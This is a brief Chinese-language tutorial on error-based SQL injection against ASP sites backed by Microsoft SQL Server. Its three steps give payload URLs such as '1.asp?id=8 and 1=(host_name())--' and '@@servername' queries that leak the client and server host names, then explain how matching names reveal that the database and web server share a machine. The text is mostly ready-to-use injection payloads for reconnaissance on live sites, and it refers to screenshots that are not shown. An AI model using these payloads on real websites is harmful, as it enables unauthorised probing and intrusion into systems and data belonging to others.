1、
得到客户端主机名:
select host_name();
http://*.com/*/1.asp?id=8 and 1=(host_name())--
如图1
2、
得到服务端主机名:
select @@servername;
http://*.com/*/1.asp?id=8 and 1=(@@servername)--
如图2
3、
从上面两图可以看出,查询出来的结果都是FRANK,说明DB和WEB没有分离,如果查询出来的结果不相同,那么
就是分离的了。